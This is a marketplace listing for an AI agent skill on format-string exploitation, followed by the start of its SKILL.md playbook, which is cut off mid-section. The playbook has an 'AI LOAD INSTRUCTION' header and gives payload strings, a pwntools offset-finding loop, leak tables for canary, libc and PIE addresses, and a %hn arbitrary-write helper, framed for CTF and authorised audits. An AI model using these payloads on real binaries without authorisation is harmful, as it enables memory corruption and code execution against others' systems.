
Format String Exploitation
Follow a structured playbook when auditing or exploiting printf-family format string bugs in CTF binaries and native code.
Overview
Format String Exploitation is an agent skill most often used in Ship (also Build integrations, Operate iterate) that teaches printf-family leak-and-write exploitation from identification through pwntools automation.
Install
npx skills add https://github.com/yaklang/hack-skills --skill format-string-exploitation
What is this skill?
- Vulnerability identification patterns for printf(user_input) and related sinks
- Stack read primitives (%p, %s) and write primitives (%n, %hn, %hhn) with offset guidance
- GOT overwrite, __malloc_hook targets, pointer chains, and blind format string scenarios
- 64-bit null-byte placement and FORTIFY_SOURCE bypass notes called out explicitly
- pwntools automation patterns and cross-links to stack overflow, heap, and arbitrary-write skills
Adoption & trust: 1.1k installs on skills.sh; 980 GitHub stars; 1/3 security scanners passed (skills.sh audits).
What problem does it solve?
You found a printf-style sink in a binary but keep mis-counting format offsets or stalling after the first leak.
Who is it for?
Advanced builders doing CTF challenges, native code audits, or security labs where format strings are the primary primitive.
Skip if: you are a beginner focused only on web app security, or you lack authorization to test the target binary.
When should I use this skill?
Use it when printf-family functions receive user-controlled format strings, which enables stack reads, arbitrary writes, GOT/hook overwrites, and canary/libc/PIE leaks.
What do I get? / Deliverables
You leave with a documented attack chain—reads, writes, and hook/GOT strategy—that you can pair with stack, heap, or arbitrary-write skills for full exploitation.
- Documented leak offsets and write strategy
- pwntools-oriented exploit steps or PoC script outline
Journey fit
Spans multiple journey phases - primary shelf plus alternate fits below.
Ship is the canonical shelf because format string work is part of hardening reviews and pre-release security assessment of native binaries. Security subphase covers vulnerability identification, leak primitives, and controlled writes before you trust a binary in production or a release artifact.
Where it fits
Pre-release review of a native CLI that logs user input through printf without a fixed format string.
You embed a legacy C library and need a checklist before linking it into your agent tooling binary.
A crash report suggests stack corruption and you suspect a dormant format string in an admin-only diagnostic path.
How it compares
Structured exploit playbook for native binaries—not a generic SAST scanner or web XSS checklist.
Common Questions / FAQ
Who is format-string-exploitation for?
Solo builders and security-focused developers who exploit or audit C/C++ binaries where printf-family functions consume attacker-controlled format strings.
When should I use format-string-exploitation?
Use it during Ship security reviews before release binaries ship; during Build when integrating native libraries you must fuzz; and during Operate iterate when reproducing a reported memory corruption issue in a CLI service.
Is format-string-exploitation safe to install?
Treat it as offensive knowledge—review the Security Audits panel on this page and only run techniques on systems you own or are explicitly permitted to test.
SKILL.md
# SKILL: Format String Exploitation - Expert Attack Playbook

> **AI LOAD INSTRUCTION**: Expert format string techniques. Covers stack reading, arbitrary write via %n, GOT overwrite, __malloc_hook overwrite, pointer chain exploitation, blind format string, FORTIFY_SOURCE bypass, 64-bit null byte handling, and pwntools automation. Distilled from ctf-wiki fmtstr, CTF patterns, and real-world scenarios. Base models often miscalculate positional parameter offsets or forget that 64-bit addresses must be placed after the format specifiers.

## 0. RELATED ROUTING

- [stack-overflow-and-rop](../stack-overflow-and-rop/SKILL.md) - combine format string leak with stack overflow for full exploit
- [binary-protection-bypass](../binary-protection-bypass/SKILL.md) - format string is the primary canary/PIE/ASLR leak method
- [arbitrary-write-to-rce](../arbitrary-write-to-rce/SKILL.md) - convert format string write primitive to code execution targets
- [heap-exploitation](../heap-exploitation/SKILL.md) - heap address leak via format string for heap exploitation

---

## 1. VULNERABILITY IDENTIFICATION

### Vulnerable Pattern

```c
printf(user_input);              // VULNERABLE: user controls format string
fprintf(fp, user_input);         // VULNERABLE
sprintf(buf, user_input);        // VULNERABLE
snprintf(buf, sz, user_input);   // VULNERABLE
printf("%s", user_input);        // SAFE: format string is fixed
```

### Quick Test

```
Input: AAAAAAAA%p%p%p%p%p%p%p%p
If output shows stack values (hex addresses): format string confirmed
Look for 0x4141414141414141 (0x41414141 on 32-bit) in output to find your input offset
```

---

## 2. READING MEMORY

### Stack Leak (%p)

| Format | Action | Use |
|---|---|---|
| `%p` | Print next stack value as pointer | Sequential stack dump |
| `%N$p` | Print N-th parameter as pointer | Direct positional access |
| `%N$lx` | Same as %p but explicit hex (64-bit) | Portable |
| `%N$s` | Dereference N-th parameter as string pointer | Read memory at pointer value |

### Finding Your Input Offset

```python
# Send:   AAAAAAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p
# Output: AAAAAAAA.0x7ffd12340000.0x0.(nil).0x7f1234567890.0x4141414141414141...
#         the 5th %p echoes the A's, so offset = 5 (example)

# Or automated (io is an open pwntools tube; the target must re-prompt after each line):
for i in range(1, 30):
    io.sendline(f'AAAAAAAA%{i}$p'.encode())   # 8 A's fill one 64-bit slot
    if b'0x41414141' in io.recvline():        # matches both 32-bit and 64-bit echoes
        print(f'Offset = {i}')
        break
```

### Leaking Specific Values

| Target | Method | Stack Position |
|---|---|---|
| Canary | `%N$p` where N = canary offset from format string | Typically near input offset + buf_size/8 (64-bit); the value ends in a 00 byte |
| Saved RBP | `%N$p` (slot just before the return address) | Leaks stack address → stack base |
| Return address | `%N$p` | Leaks .text address (PIE base = leak - return-site offset; check base & 0xfff == 0) |
| Libc address | `%N$p` where N points to `__libc_start_main+XX` return on stack | libc base = leak - offset |

### Reading Arbitrary Address (%s)

```python
# 32-bit: place address at start of format string
payload = p32(target_addr) + b'%N$s'   # N = offset where target_addr appears on stack

# 64-bit: address contains null bytes → place AFTER format specifiers
# The 8-byte prefix fills one slot, so the address lands at input offset + 1 (8 here)
payload = b'%8$sAAAA' + p64(target_addr)
```

---

## 3. WRITING MEMORY (%n)

### Write Specifiers

| Specifier | Bytes Written | Value Written |
|---|---|---|
| `%n` | 4 bytes (int) | Characters printed so far |
| `%hn` | 2 bytes (short) | Characters printed so far (mod 0x10000) |
| `%hhn` | 1 byte (char) | Characters printed so far (mod 0x100) |
| `%ln` | 8 bytes (long; 4 on 32-bit targets) | Characters printed so far |

### Arbitrary Write Technique

**Goal**: Write value `V` to address `A`.
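Because every write specifier stores the number of characters printed so far, writing `V` in 2-byte pieces is mostly padding arithmetic. The sketch below is a minimal illustration, not part of the original playbook: `hn_write_plan` is a hypothetical helper, and it assumes pointers to `A`, `A+2`, ... already sit at consecutive positional indices starting at `first_index`. It relies on glibc accepting `%Nc` padding mixed with positional `%K$hn`, which is the style commonly seen in CTF payloads.

```python
def hn_write_plan(value, first_index, n_chunks=2, already_printed=0):
    """Build the specifier fragment that writes `value` using %hn.

    Hypothetical helper for illustration only.
    value           -- integer to write, split into 16-bit little-endian chunks
    first_index     -- positional index of the pointer to the lowest chunk;
                       pointers to later chunks are assumed to follow it
    already_printed -- characters output before this fragment starts
    """
    # Pair each 16-bit chunk with the positional index of its target pointer.
    chunks = [((value >> (16 * k)) & 0xFFFF, first_index + k)
              for k in range(n_chunks)]
    fragment = ""
    printed = already_printed
    # Write the smallest chunk first so each step only needs to add padding.
    for target, index in sorted(chunks):
        pad = (target - printed) % 0x10000   # wraps if we are already past it
        if pad:
            fragment += f"%{pad}c"
        fragment += f"%{index}$hn"
        printed += pad
    return fragment


print(hn_write_plan(0x12345678, 7))   # %4660c%8$hn%17476c%7$hn
```

The high half (0x1234) is written first because it is the smaller count; the low half then needs only the difference as extra padding. In practice, pwntools' `fmtstr_payload` automates the same bookkeeping, including address placement.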
**32-bit** (address on stack directly):

```python
# Write 2 bytes at a time using %hn
# Place target addresses in